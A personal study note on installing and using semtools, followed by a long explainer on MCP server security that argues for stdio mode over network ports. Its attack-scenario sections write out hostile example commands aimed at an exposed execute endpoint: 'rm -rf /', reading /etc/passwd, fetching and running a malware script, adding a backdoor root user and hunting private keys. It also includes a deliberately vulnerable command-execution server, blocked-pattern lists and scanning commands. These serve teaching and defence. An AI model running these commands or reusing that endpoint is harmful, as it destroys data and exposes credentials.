# Semtools and MCP Learning Summary
## Semtools Installation and Setup
### Installation Process
1. **Initial Challenge**: Required Rust/Cargo version supporting Edition 2024
- Original version: Cargo 1.68.2 (outdated)
- Solution: Updated to Cargo 1.89.0 via `rustup update`
2. **Installation Command**:
```bash
cargo install semtools
```
3. **Installed Executables**:
- `parse` - Document parsing tool (located at `~/.cargo/bin/parse`)
- `search` - Semantic search tool (located at `~/.cargo/bin/search`)
### Parse Tool Configuration
#### Configuration File Location
- Path: `~/.parse_config.json`
#### Required Configuration Structure
```json
{
"api_key": "your_llama_cloud_api_key_here",
"num_ongoing_requests": 10,
"base_url": "https://api.cloud.llamaindex.ai",
"check_interval": 5,
"max_timeout": 3600,
"max_retries": 10,
"retry_delay_ms": 1000,
"backoff_multiplier": 2.0,
"parse_kwargs": {
"parse_mode": "parse_page_with_agent",
"model": "openai-gpt-4-1-mini",
"high_res_ocr": "true",
"adaptive_long_table": "true",
"outlined_table_extraction": "true",
"output_tables_as_HTML": "true"
}
}
```
#### Key Configuration Learnings
- All fields are mandatory - missing any field causes errors
- Requires LlamaParse API key from cloud.llamaindex.ai
- Parse output is saved to `~/.parse/[filename].md`
- Supports advanced PDF parsing with OCR and table extraction
### Using Semtools
#### Parse Command
```bash
# Basic usage
parse "filename.pdf"
# With verbose output
parse --verbose "filename.pdf"
# Help
parse --help
```
**Features**:
- Converts PDFs to markdown format
- Extracts tables as HTML
- Handles complex layouts with AI assistance
- Preserves document structure
#### Search Command
```bash
# Basic semantic search
search "query terms" "file.md"
# With context lines
search "query" "file.md" -n 5
# Top-k results
search "query" "file.md" --top-k 5
# Help
search --help
```
**Features**:
- Semantic search (finds contextually relevant content)
- Returns similarity scores (lower = better match)
- Shows context around matches
- Supports multiple files/directories
### Practical Examples Performed
#### Example 1: Parsing the CompanyA PDF
**Command Used:**
```bash
parse "CompanyA - Intro H2 2024.pdf"
```
**Result:** Successfully parsed to `/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md`
**Sample Parsed Content:**
```markdown
# INTRODUCTION COMPANYA UK
## THE COMPANY AND PORTFOLIO AT A GLANCE
## COMPANYA | AT A GLANCE
> We specialise in creating software for a wide range of industries and technologies, actively playing a part in the digitisation of Europe.
> With a dedicated team of over **10,000 EMPLOYEES** (CompanyA Group | Feb. 2024) across Europe, we have recently broadened our scope to include the UK market, starting just one year ago.
## GROUP REVENUE 2023
- approx. **1.1 B. Euros**
## NUMEROUS AWARDS
| Year | Award / Recognition |
|-------|---------------------------------------------|
| 2023 | Data, Analytics & AI Market Leader |
| 2020 | [Award logo shown] |
```
#### Example 2: Semantic Search for Awards
**Command Used:**
```bash
search "awards achievements recognition excellence" "/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md"
```
**Results Found:**
```
/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:446::453 (0.4192522861034296)
## Awards shown on trophies
- Beste Arbeitgeber ITK
Great Place To Work 2020
/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:27::34 (0.639156086580848)
## NUMEROUS AWARDS
| Year | Award / Recognition |
|-------|---------------------------------------------|
| 2023 | Data, Analytics & AI Market Leader |
```
#### Example 3: Financial Performance Search
**Command Used:**
```bash
search "1.1 billion euros revenue" "/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md" --top-k 5
```
**Results Found:**
```
/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:21::28 (0.5080750291633499)
## GROUP REVENUE 2023
- approx. **1.1 B. Euros**
/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:10::17 (0.7265656264502557)
> With a dedicated team of over **10,000 EMPLOYEES** (CompanyA Group | Feb. 2024) across Europe, we have recently broadened our scope to include the UK market, starting just one year ago.
```
#### Example 4: Company Positioning Search
**Command Used:**
```bash
search "speed boat agility flexibility enterprise scalability" "/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md" -n 5
```
**Key Result Found:**
```
/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:183::194 (0.4164071779051679)
> CompanyA combines the professionalism and scalability of a large IT company with the agility and flexibility of a small IT service provider and thus offers you ...
> * ...a pronounced **service provider mentality**!
> * ...solution-oriented services with optimal **benefits**!
> * ...pragmatic, **fast solutions** and hands-on mentality!
> * ...a very high service quality designed for **speed**!
> * ...extraordinary **flexibility** in cooperation!
> * ...fast and variable **scalability** in the services - both OnShore and with CompanyA SmartShore!
**WE JUST DO IT!**
```
### Key Discoveries from Parsed Content
**Company Overview:**
- Founded 1997 in Germany, became CompanyA SE in 2019
- Over 10,000 employees across Europe
- €1.1 billion revenue (2023)
- 64 locations in Europe & UK
**Major Clients Found:**
```
COMMERZBANK, DEUTSCHE BUNDESBANK, Bayern LB, Munich RE, MAN, DAIMLER,
vodafone, T-Mobile, SwissLife, ZURICH, AOK, BARMER, Union Investment
```
**Industry Services Table Extracted:**
```html
| Automotive |
Banking |
Health |
Insurance |
Life Sciences |
Manufacturing Industry |
Public |
Retail |
Utilities |
```
**Unique Value Proposition Discovered:**
The company positions itself as combining "Speed Boat" agility with "Big Player" enterprise capabilities - offering both the flexibility of a small service provider and the scalability of a large corporation.
## MCP (Model Context Protocol) Security Insights
### Why Terminal Access MCP is Unsafe
1. **Unrestricted Command Execution**
- Can execute ANY system command
- Same privileges as running user
- Direct file system access
2. **No Sandboxing**
- Runs directly on host system
- No container/VM isolation
- Can affect other processes
3. **Security Risks**
- Privilege escalation potential
- Remote code execution vector
- Data exfiltration capabilities
- Lack of audit trails
### Safer MCP Usage Patterns
#### 1. Read-Only Operations
```json
{
"tools": [
{"name": "read_file", "permissions": "read-only"},
{"name": "list_directory", "permissions": "read-only"}
]
}
```
#### 2. Containerization
```bash
docker run --read-only \
--security-opt=no-new-privileges \
--cap-drop=ALL \
--user=nobody \
mcp-server
```
#### 3. Whitelisted Commands
```javascript
{
"allowed_commands": [
"git status",
"npm list",
"python --version"
],
"blocked_patterns": [
"rm -rf",
"sudo",
"curl | bash"
]
}
```
#### 4. Use Stdio Mode (Recommended)
```bash
# Safer - uses stdio pipes
npx @modelcontextprotocol/server-name
# Riskier - exposes network port
npx @modelcontextprotocol/server-name --port 3000
```
### Best Practices for MCP
1. **Default Deny Policy**: Block everything by default, explicitly allow needed operations
2. **Principle of Least Privilege**: Run with minimal necessary permissions
3. **Comprehensive Logging**: Audit all operations
4. **Use Trusted Servers**: Stick to official/verified MCP implementations
5. **Rate Limiting**: Prevent abuse through request limits
6. **Approval Workflows**: Require confirmation for sensitive operations
### Safe MCP Configuration Example
```json
{
"mcp_servers": {
"filesystem": {
"command": "npx",
"args": ["@modelcontextprotocol/server-filesystem", "/safe/directory"],
"permissions": {
"read": true,
"write": false,
"execute": false
}
},
"memory": {
"command": "npx",
"args": ["@modelcontextprotocol/server-memory"],
"sandboxed": true
}
}
}
```
### Why Exposing Port 3000 (or Any Port) is Risky
#### 1. **Network Attack Surface**
When you expose a port like 3000:
```bash
# RISKY - Creates network listener
npx @modelcontextprotocol/server-name --port 3000
```
This opens port 3000 to network connections, meaning:
- Any process on your machine can connect
- If firewall is misconfigured, external attackers could connect
- Creates a persistent network service that can be discovered
- Enables port scanning and service enumeration
#### 2. **Localhost Still Has Risks**
Even binding to `127.0.0.1:3000` isn't completely safe:
- Other local processes can connect (including malware)
- Browser-based attacks via JavaScript `fetch()` or XHR
- Port scanning by local malicious software
- Shared systems allow other users to connect
- No built-in authentication on most MCP servers
#### 3. **Common Misconfiguration Dangers**
```bash
# VERY DANGEROUS - Binds to all interfaces
npx server --port 3000 --host 0.0.0.0
# Docker mistake - Exposes to internet!
docker run -p 3000:3000 mcp-server # Exposed externally!
```
#### 4. **Missing Security Controls**
Network-exposed MCP servers typically lack:
- Authentication mechanisms
- Rate limiting
- Request validation
- Access controls
- Encryption (HTTP vs HTTPS)
#### 5. **Protocol Vulnerabilities**
HTTP/TCP protocols over network can suffer from:
- Man-in-the-middle attacks
- Request injection
- Buffer overflow exploits
- Protocol confusion attacks
- Session hijacking
#### 6. **Real-World Attack Scenarios**
**Scenario 1: Malware Exploitation**
```bash
# Malware discovers open port 3000
curl http://127.0.0.1:3000/execute -d '{"command": "rm -rf /"}'
```
**Scenario 2: Browser-Based Attack**
```javascript
// Malicious website exploits local MCP server
fetch('http://127.0.0.1:3000/api/files')
.then(data => sendToAttacker(data))
```
**Scenario 3: Docker Misconfiguration**
```dockerfile
# DANGEROUS - Exposes to internet
EXPOSE 3000
# Running with -p 3000:3000 makes it public!
```
#### Why Stdio Mode is Safer
```bash
# SAFE - Uses stdio pipes, no network
npx @modelcontextprotocol/server-name
```
**Stdio advantages:**
- **No network exposure** - only parent process can communicate
- **Process isolation** - communication through pipes only
- **Automatic cleanup** - dies when parent process exits
- **OS-level security** - leverages process permissions
- **No port scanning** - invisible to network tools
- **No remote access** - physically impossible to connect remotely
#### Network Security Best Practices (If Ports Are Required)
1. **Bind to Localhost Only**
```bash
npx server --port 3000 --host 127.0.0.1
```
2. **Use Unix Domain Sockets Instead**
```bash
# Better than TCP ports
npx server --socket /tmp/mcp.sock
chmod 600 /tmp/mcp.sock # Restrict permissions
```
3. **Add Authentication Layer**
```javascript
{
"auth": {
"type": "bearer",
"token": "secure-random-token"
}
}
```
4. **Implement Rate Limiting**
```javascript
{
"rate_limit": {
"requests_per_minute": 60,
"max_connections": 5
}
}
```
5. **Use TLS/SSL for Encryption**
```bash
# Use HTTPS instead of HTTP
npx server --port 3000 --cert server.crt --key server.key
```
#### Architecture Comparison
**Network Mode (Risky):**
```
Claude Code → Network Stack → Port 3000 → MCP Server
↑ ↑
Attacker Port Scanner
```
**Stdio Mode (Safe):**
```
Claude Code ←→ Stdio Pipes ←→ MCP Server
(Process Isolation)
```
#### Key Principle
**Avoid network protocols when local IPC (Inter-Process Communication) suffices.** Network exposure should only be used when absolutely necessary and with proper security controls.
### Deep Dive: Why `docker run -p 3000:3000` Exposes to Internet
This is a critical concept that catches many developers off-guard. Let's break down exactly why this seemingly innocent command creates internet exposure:
#### How Docker's `-p` Flag Works
The `-p` (or `--publish`) flag creates port mapping from host to container:
```bash
-p [host_port]:[container_port]
-p 3000:3000
↑ ↑
| └── Port inside the container
└── Port on your host machine (YOUR COMPUTER)
```
#### The Critical Detail: Default Binding Behavior
**By default, `-p 3000:3000` binds to `0.0.0.0:3000` on your host**, which means:
```bash
# What you type:
docker run -p 3000:3000 mcp-server
# What Docker actually does:
docker run -p 0.0.0.0:3000:3000 mcp-server
↑
└── ALL network interfaces!
```
#### What `0.0.0.0` Actually Means
- `0.0.0.0` = "bind to all available network interfaces"
- This includes:
- `127.0.0.1` (localhost/loopback)
- Your WiFi IP (e.g., `192.168.1.100`)
- Your Ethernet IP
- **Your public IP address if directly connected**
#### Internet Exposure Scenarios
**1. Cloud/VPS Servers**
```bash
# Running on AWS, Azure, DigitalOcean, etc.
docker run -p 3000:3000 mcp-server
# Now accessible at: http://your-server-public-ip:3000
# Anyone on the internet can connect!
```
**2. Home Networks with Port Forwarding**
```bash
# Your router forwards port 3000, or has DMZ enabled
# Your service becomes accessible from outside your network
```
**3. Corporate Networks**
```bash
# Many corporate networks have direct routing
# Port 3000 becomes accessible to entire corporate network
# Could violate security policies
```
#### Real Attack Scenario
```bash
# You innocently run:
docker run -p 3000:3000 mcp-server
# Attacker from anywhere can now:
curl http://your-public-ip:3000/execute \
-d '{"command": "cat /etc/passwd"}'
curl http://your-public-ip:3000/files \
-d '{"action": "list", "path": "/"}'
```
#### How to Run Docker Safely
**Option 1: Explicit Localhost Binding (Recommended)**
```bash
# SAFE - Only accessible from your machine
docker run -p 127.0.0.1:3000:3000 mcp-server
↑
└── Explicitly bind to localhost only
```
**Option 2: Use Docker Networks (Most Secure)**
```bash
# SAFE - Internal Docker network only, no external ports
docker network create mcp-network
docker run --network mcp-network --name mcp-server mcp-server
docker run --network mcp-network my-app
# Containers can talk to each other, but no external access
```
**Option 3: Unix Domain Sockets**
```bash
# SAFE - Filesystem-based communication
docker run -v /tmp:/tmp mcp-server --socket /tmp/mcp.sock
# No network exposure at all
```
#### How to Check If You're Currently Exposed
```bash
# Check what's listening on port 3000
netstat -an | grep 3000
# OR
ss -tulpn | grep 3000
# If you see this, you're EXPOSED:
tcp 0.0.0.0:3000 *:* LISTEN # BAD - listening on all interfaces
# If you see this, you're SAFE:
tcp 127.0.0.1:3000 *:* LISTEN # GOOD - localhost only
```
#### Scan for Exposed Services
```bash
# Check from external perspective
nmap your-public-ip
# If port 3000 shows up, you're exposed!
# Check Docker port mappings
docker port container-name
# Shows all port mappings for container
```
#### Common Dangerous Misunderstandings
1. **"It's just Docker, it's contained"**
- Docker doesn't add security by default
- `-p` flag explicitly breaks container isolation
2. **"I'm behind NAT/firewall"**
- NAT isn't a security boundary
- Many routers have UPnP that auto-opens ports
- Docker can modify firewall rules automatically
3. **"It's just for development/testing"**
- Attackers continuously scan for development services
- Test servers often have weaker security
- "Temporary" often becomes permanent
4. **"My cloud provider protects me"**
- Most cloud instances have public IPs
- Security groups/firewalls must be explicitly configured
- Default configurations often allow wide access
#### Docker Security Best Practices
**1. Never Use Default Port Binding in Production**
```bash
# NEVER do this in production:
docker run -p 3000:3000 app
# Always specify bind address:
docker run -p 127.0.0.1:3000:3000 app
```
**2. Use Docker Networks for Inter-Container Communication**
```bash
# Create isolated network
docker network create --driver bridge app-network
# Run containers on network
docker run --network app-network api-server
docker run --network app-network database
# No external ports needed!
```
**3. Implement Reverse Proxy Pattern**
```bash
# Only expose reverse proxy (nginx, traefik)
docker run -p 127.0.0.1:80:80 nginx
docker run --network internal-network app1
docker run --network internal-network app2
# Apps not directly accessible from outside
```
**4. Use Environment-Specific Configurations**
```yaml
# docker-compose.yml
version: '3'
services:
mcp-server:
# Development
ports:
- "127.0.0.1:3000:3000" # Safe local binding
# Production
networks:
- internal # No external ports
```
#### Firewall Interaction Warning
Docker manipulates iptables rules automatically:
```bash
# Docker adds rules that can bypass your firewall!
# Check what Docker added:
iptables -L DOCKER
# Docker rules often come BEFORE your custom rules
# Your firewall config might be ignored!
```
#### The Bottom Line
**`docker run -p 3000:3000` is equivalent to running a public web server.** It tells Docker to accept connections from **anywhere on the internet** and forward them to your container. Unless you explicitly specify `127.0.0.1`, Docker assumes you want global accessibility.
This is why:
- Stdio mode is preferred for MCP servers (no network at all)
- If ports are needed, always bind to `127.0.0.1:port`
- Never omit the bind address in production
- Use Docker networks for internal communication
- Regularly audit your exposed ports with `netstat` or `nmap`
**Remember: Convenience is the enemy of security. Always be explicit about network exposure.**
### Understanding Attack Commands: The `-d` Flag in curl
Many of the attack examples in this document use curl with the `-d` flag. Understanding what this flag does is crucial for comprehending the security risks:
#### What the `-d` Flag Does
The `-d` flag in curl stands for "**data**" and is used to send HTTP POST data in the request body:
```bash
curl http://127.0.0.1:3000/execute -d '{"command": "rm -rf /"}'
↑ ↑
| └── POST data (JSON payload)
└── Target URL
```
#### Technical Breakdown
1. **HTTP Method**: `-d` automatically changes the request from GET to POST
2. **Content-Type**: Sets `Content-Type: application/x-www-form-urlencoded` by default
3. **Request Body**: Places the data in the HTTP request body
4. **JSON Data**: The string becomes the POST payload sent to the server
#### The HTTP Request Generated
```http
POST /execute HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
{"command": "rm -rf /"}
```
#### What `rm -rf /` Actually Does
This is one of the most destructive commands possible on Unix/Linux systems:
- `rm` = remove/delete command
- `-r` = recursive (delete directories and all their contents)
- `-f` = force (don't prompt for confirmation, ignore nonexistent files)
- `/` = root directory (the entire filesystem)
**Translation**: "Delete everything on the system without asking for confirmation"
#### Real-World Impact of This Attack
If an MCP server executes this command, the results are catastrophic:
- **Operating System**: Completely destroyed
- **All Applications**: Deleted permanently
- **User Data**: Gone forever (documents, databases, configurations)
- **System Recovery**: Impossible without complete restoration from backups
- **Server Status**: Completely bricked and unusable
- **Business Impact**: Complete system downtime, potential data loss
#### Other Dangerous Commands via `-d`
```bash
# Exfiltrate sensitive data
curl -d '{"command": "cat /etc/passwd"}' http://127.0.0.1:3000/execute
# Download and execute malware
curl -d '{"command": "curl malicious-site.com/malware.sh | bash"}' url
# Create backdoor access
curl -d '{"command": "echo \"hacker::0:0::/root:/bin/bash\" >> /etc/passwd"}' url
# Steal environment variables (often contain secrets)
curl -d '{"command": "env"}' http://127.0.0.1:3000/execute
# Access private keys
curl -d '{"command": "find /home -name \"*.key\" -o -name \"id_rsa\""}' url
```
#### Other curl `-d` Flag Variations
```bash
# Send JSON with proper content-type
curl -d '{"key": "value"}' -H "Content-Type: application/json" url
# Send form data
curl -d "username=admin&password=secret" url
# Send from file
curl -d @malicious-payload.json url
# Multiple data parameters
curl -d "field1=value1" -d "field2=value2" url
# URL encode data
curl -d "message=hello%20world" url
```
#### Why These Examples Are So Effective
1. **No Authentication**: Most development MCP servers have no authentication
2. **Full Privileges**: MCP servers often run with the same privileges as the user
3. **Direct Execution**: Commands execute immediately without validation
4. **No Logging**: Many servers don't log incoming commands
5. **Network Accessible**: `-p 3000:3000` makes them reachable from anywhere
#### The Security Lesson
The `-d` flag itself is completely innocent - it's just a way to send data with HTTP POST requests. The danger comes from:
1. **Unsecured Endpoints**: Servers that execute any command without validation
2. **Network Exposure**: Making these endpoints accessible over the network
3. **Lack of Input Validation**: Not sanitizing or restricting incoming commands
4. **Missing Authentication**: No verification of who is sending commands
5. **Excessive Privileges**: Running servers with unnecessary system access
#### Defense Against These Attacks
**1. Never Expose Command Execution Endpoints**
```bash
# DON'T create endpoints like:
/execute
/command
/run
/shell
```
**2. Use Whitelisted Operations Instead**
```json
{
"allowed_operations": [
"get_status",
"list_files",
"read_config"
],
"blocked_operations": ["execute", "command", "shell"]
}
```
**3. Input Validation and Sanitization**
```javascript
// Validate incoming data
if (data.command.includes('rm -rf')) {
throw new Error('Destructive command blocked');
}
// Use command whitelists
const allowedCommands = ['git status', 'npm version'];
if (!allowedCommands.includes(data.command)) {
throw new Error('Command not allowed');
}
```
**4. Run with Minimal Privileges**
```bash
# Create restricted user
useradd --no-create-home --shell /bin/false mcp-user
# Run server as restricted user
sudo -u mcp-user node mcp-server.js
```
**5. Use Stdio Mode (Eliminates Network Attacks)**
```bash
# SAFE - No network exposure possible
npx @modelcontextprotocol/server-name
# DANGEROUS - Network exposed
npx @modelcontextprotocol/server-name --port 3000
```
#### Key Takeaway
**The `-d` flag is just the delivery mechanism. The real danger is having network-accessible endpoints that execute arbitrary commands without proper security controls.** This is why stdio mode is strongly recommended for MCP servers - it eliminates the entire network attack surface.
## STDIO Mode vs Network Protocols: OSI Model Deep Dive
Understanding why STDIO mode is fundamentally safer requires understanding the difference between **Inter-Process Communication (IPC)** and **network protocols** in the context of the OSI model.
### STDIO Mode Explained
**STDIO (Standard Input/Output) mode** uses operating system pipes for communication instead of network sockets:
```bash
# STDIO Mode (SAFE) - Uses OS pipes
npx @modelcontextprotocol/server-name
# Network Mode (RISKY) - Uses TCP/IP sockets
npx @modelcontextprotocol/server-name --port 3000
```
### OSI Model Attack Surface Comparison
#### Network Mode - Full OSI Stack Exposure
Network-based MCP servers traverse the complete OSI stack, creating attack surfaces at every layer:
```
┌─────────────────────────────────────────┐
│ Layer 7: Application (HTTP, MCP Protocol) │ ← Command injection attacks
├─────────────────────────────────────────┤
│ Layer 6: Presentation (JSON encoding) │ ← Data manipulation attacks
├─────────────────────────────────────────┤
│ Layer 5: Session (HTTP sessions) │ ← Session hijacking
├─────────────────────────────────────────┤
│ Layer 4: Transport (TCP) │ ← Port scanning, DoS attacks
├─────────────────────────────────────────┤
│ Layer 3: Network (IP routing) │ ← IP spoofing, routing attacks
├─────────────────────────────────────────┤
│ Layer 2: Data Link (Ethernet) │ ← ARP poisoning, MAC spoofing
├─────────────────────────────────────────┤
│ Layer 1: Physical (Network interface) │ ← Physical network access
└─────────────────────────────────────────┘
```
#### STDIO Mode - Zero Network Stack Involvement
STDIO mode completely bypasses the network stack, operating at the OS process level:
```
┌─────────────────────────────────────────┐
│ Application Layer (MCP Protocol) │ ← Only accessible to parent process
├─────────────────────────────────────────┤
│ Operating System IPC (Pipes) │ ← Protected by process isolation
├─────────────────────────────────────────┤
│ Kernel System Calls │ ← OS enforces access controls
├─────────────────────────────────────────┤
│ Process Management │ ← Cannot be accessed remotely
└─────────────────────────────────────────┘
```
### Communication Flow Comparison
#### Network Mode Communication Path
```bash
# Network mode creates this communication path:
Claude Code ──→ TCP Socket ──→ Network Stack ──→ Port 3000 ──→ MCP Server
│ │ │ │ │
Layer 7 Layer 4 Layers 3-1 Layers 4-7 Layer 7
# Attack vector exists:
Attacker ──→ Internet ──→ Your Network ──→ Port 3000 ──→ MCP Server
```
#### STDIO Mode Communication Path
```bash
# STDIO mode creates this isolated path:
Claude Code ──→ Process Fork ──→ OS Pipes ──→ MCP Server
│ │ │ │
Parent Process Child Process OS IPC Child Process
# NO network layers involved!
# Attacker has NO path to reach MCP Server
```
### Inter-Process Communication (IPC) vs Network Protocols
#### IPC Mechanisms (All Local, Secure)
**STDIO pipes are one form of IPC. All IPC mechanisms are local-only:**
```c
// Simplified view of STDIO pipe creation
int pipe_fd[2];
pipe(pipe_fd); // Creates bidirectional pipe between processes
// Parent (Claude Code) writes to pipe
write(pipe_fd[1], "get status", 10);
// Child (MCP Server) reads from pipe
read(pipe_fd[0], buffer, 10);
// This communication is invisible to network tools
// No external process can intercept or inject data
```
**Other IPC Mechanisms (All Safe):**
- **Pipes** (STDIO mode uses these)
- **Named pipes (FIFOs)** - Filesystem-based pipes
- **Unix domain sockets** - Local socket files
- **Shared memory** - Direct memory sharing
- **Message queues** - OS-managed message passing
- **Semaphores** - Process synchronization
#### Network Protocols (Can Be Remote, Dangerous)
**Network sockets are designed for remote access:**
```c
// Network socket creation (dangerous for MCP)
int sock = socket(AF_INET, SOCK_STREAM, 0); // Internet socket
struct sockaddr_in addr = {
.sin_family = AF_INET,
.sin_port = htons(3000),
.sin_addr.s_addr = INADDR_ANY // 0.0.0.0 - ALL interfaces!
};
bind(sock, (struct sockaddr*)&addr, sizeof(addr));
listen(sock, 5); // Ready to accept connections
// This socket can accept connections from:
// - localhost (127.0.0.1)
// - Local network (192.168.x.x)
// - Internet (any public IP)
// - Docker containers
// - VPN connections
```
### Process Isolation Model (STDIO)
STDIO mode creates strong process isolation enforced by the operating system:
```bash
┌──────────────────┐ Pipes ┌──────────────────┐
│ Claude Code │◄──────────►│ MCP Server │
│ (Parent) │ │ (Child) │
│ PID: 1234 │ │ PID: 1235 │
│ User: alice │ │ User: alice │
└──────────────────┘ └──────────────────┘
▲ ▲
│ │
│ OS Process Management │
┌────▼────────────────────────────────▼────┐
│ Operating System Kernel │
│ • Enforces process boundaries │
│ • Manages pipe permissions │
│ • Prevents external access │
│ • Cleans up on process death │
└─────────────────────────────────────────┘
```
### Security Properties of Each Approach
#### STDIO Mode Security Properties
```bash
✅ Process Isolation: Communication only between parent/child
✅ No Network Exposure: Cannot be reached from network
✅ Automatic Cleanup: Dies when parent process exits
✅ OS Access Control: Kernel enforces permissions
✅ No Port Scanning: Invisible to network discovery
✅ No Remote Access: Physically impossible to connect remotely
✅ Firewall Irrelevant: No network traffic to filter
✅ No Authentication: Not needed - process isolation provides security
```
#### Network Mode Security Weaknesses
```bash
❌ Network Exposure: Accessible from network interfaces
❌ Port Discovery: Can be found via port scanning
❌ Authentication Gap: Often lacks proper auth mechanisms
❌ Firewall Dependency: Security depends on external firewall config
❌ Protocol Attacks: Vulnerable to HTTP/TCP-level attacks
❌ Remote Accessibility: Can be reached from internet if misconfigured
❌ Persistent Service: Continues running independently
❌ Multi-layer Risk: Attack surface across all OSI layers
```
### Practical Code Examples
#### STDIO Mode Implementation (Secure)
**Programming Language Note**: *The following example is written in **JavaScript** for the **Node.js** runtime environment. Node.js is a JavaScript runtime that allows JavaScript to run on servers and desktops (not just in web browsers). It provides APIs for system operations like spawning processes and file management.*
```javascript
// How Claude Code securely spawns MCP server via STDIO
const { spawn } = require('child_process');
// Spawn child process with stdio pipes
const mcpServer = spawn('npx', ['@modelcontextprotocol/server-memory'], {
stdio: ['pipe', 'pipe', 'pipe'] // stdin, stdout, stderr pipes
});
// Secure communication via pipes
mcpServer.stdin.write(JSON.stringify({
method: "get_status",
id: 1
}) + '\n');
// Receive response via stdout pipe
mcpServer.stdout.on('data', (data) => {
const response = JSON.parse(data.toString());
console.log('Secure response:', response);
});
// Process automatically dies when Claude Code exits
// NO NETWORK INVOLVEMENT AT ANY LEVEL
// Other processes cannot access this communication channel
```
**Code Explanation for Non-JavaScript Readers:**
```javascript
// Line-by-line breakdown:
// 1. Import Node.js module for creating child processes
const { spawn } = require('child_process');
// ↑ Destructuring assignment (extracts 'spawn' function)
// ↑ CommonJS module import (Node.js style)
// 2. Create a new child process running the MCP server
const mcpServer = spawn('npx', ['@modelcontextprotocol/server-memory'], {
// ↑ Variable to hold process reference
// ↑ Command to run ('npx' - Node package executor)
// ↑ Arguments passed to the command
stdio: ['pipe', 'pipe', 'pipe'] // Configure input/output streams
// ↑ stdin ↑ stdout ↑ stderr (standard streams)
});
// 3. Send data TO the child process via its input stream
mcpServer.stdin.write(JSON.stringify({
// ↑ stdin = standard input (pipe TO child)
// ↑ Convert JavaScript object to JSON string
method: "get_status", // JavaScript object with method name
id: 1 // and request ID
}) + '\n'); // Add newline character (message delimiter)
// 4. Listen FOR data FROM the child process via its output stream
mcpServer.stdout.on('data', (data) => {
// ↑ stdout = standard output (pipe FROM child)
// ↑ Event listener pattern
// ↑ Arrow function (ES6 syntax)
const response = JSON.parse(data.toString());
// ↑ Convert received bytes to string, then parse JSON
console.log('Secure response:', response);
// ↑ Print to console (like printf, print, echo in other languages)
});
```
**Key JavaScript/Node.js Concepts:**
1. **`require()`**: Node.js way to import modules (like `import` in Python or `#include` in C)
2. **`const`**: Creates a constant variable (immutable reference)
3. **`spawn()`**: Node.js function to create child processes
4. **`stdio`**: Configuration for Standard Input/Output streams
5. **`.write()`**: Method to send data through a pipe
6. **`.on()`**: Event listener pattern (similar to callbacks)
7. **Arrow functions `=>`**: Modern JavaScript function syntax
8. **`JSON.stringify()`/`JSON.parse()`**: Convert between objects and JSON strings
**Equivalent Concepts in Other Languages:**
```python
# Python equivalent (conceptual)
import subprocess
import json
# Spawn child process with pipes
process = subprocess.Popen(
['npx', '@modelcontextprotocol/server-memory'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# Send data to child
request = json.dumps({"method": "get_status", "id": 1}) + "\n"
process.stdin.write(request.encode())
# Read response from child
response_data = process.stdout.readline()
response = json.loads(response_data.decode())
print("Secure response:", response)
```
```bash
# Bash equivalent (conceptual)
# Start MCP server in background with pipes
npx @modelcontextprotocol/server-memory &
SERVER_PID=$!
# Send request via echo and pipe
echo '{"method": "get_status", "id": 1}' | npx @modelcontextprotocol/server-memory
# The pipes are automatically managed by the shell
```
**Why This Code is Secure:**
- **No network ports**: Uses process pipes, not TCP/UDP sockets
- **Process isolation**: Only parent can communicate with child
- **Automatic cleanup**: Child dies when parent exits
- **OS-level protection**: Kernel enforces access controls
- **No external visibility**: Cannot be discovered by network tools
#### Network Mode Implementation (Vulnerable)
```javascript
// Dangerous network-based MCP server
const express = require('express');
const { exec } = require('child_process');
const app = express();
app.use(express.json());
// DANGEROUS: Command execution endpoint
app.post('/execute', (req, res) => {
const { command } = req.body;
// NO INPUT VALIDATION
// NO AUTHENTICATION
// NO RATE LIMITING
exec(command, (error, stdout, stderr) => {
res.json({
output: stdout,
error: stderr
});
});
});
// EXPOSES TO ALL NETWORK INTERFACES
app.listen(3000, '0.0.0.0', () => {
console.log('MCP server exposed on port 3000');
// Attack vectors now available:
// - Same machine: curl localhost:3000
// - Local network: curl 192.168.1.100:3000
// - Internet: curl your-public-ip:3000
// - Container networks: curl container-ip:3000
});
```
### Attack Surface Analysis by OSI Layer
#### Network Mode - Vulnerabilities at Each Layer
```bash
# Layer 7 (Application):
- Command injection via HTTP POST
- Authentication bypass
- Input validation failures
- Protocol confusion attacks
# Layer 6 (Presentation):
- JSON parsing vulnerabilities
- Encoding manipulation
- Data format attacks
# Layer 5 (Session):
- Session hijacking
- Connection state attacks
- Keep-alive exploitation
# Layer 4 (Transport):
- TCP port scanning
- Connection flooding (DoS)
- Sequence number attacks
- Port exhaustion
# Layer 3 (Network):
- IP address spoofing
- Routing table attacks
- Man-in-the-middle attacks
- Network reconnaissance
# Layer 2 (Data Link):
- ARP cache poisoning
- MAC address spoofing
- Switch flooding attacks
# Layer 1 (Physical):
- Network cable tapping
- WiFi interception
- Network infrastructure attacks
```
#### STDIO Mode - Zero Network Attack Surface
```bash
# Operating System Level:
✅ Process isolation prevents external access
✅ Pipe permissions enforced by kernel
✅ No network protocols involved
✅ Cannot be discovered by network scanning
✅ Automatic resource cleanup on parent exit
# The only attack vector:
- Compromise the parent process (Claude Code)
- But this doesn't create NEW attack surface
- Parent process security is already critical
```
### Network Discovery and Scanning
#### How Network Mode Can Be Discovered
```bash
# Port scanning reveals network services
nmap -p 1-65535 target-ip
# Output shows: 3000/tcp open
# Service fingerprinting
nmap -sV -p 3000 target-ip
# May reveal: "Node.js Express framework"
# HTTP service enumeration
curl -v http://target-ip:3000
# Reveals endpoints and server information
# Automated vulnerability scanning
nikto -h http://target-ip:3000
sqlmap -u "http://target-ip:3000/execute" --data="command=test"
```
#### STDIO Mode Is Invisible to Network Tools
```bash
# Port scanning shows nothing
nmap -p 1-65535 target-ip
# No additional open ports from MCP server
# Process scanning (requires local access)
ps aux | grep mcp
# Shows process but no network binding
# Network connection scanning
netstat -tulpn | grep mcp
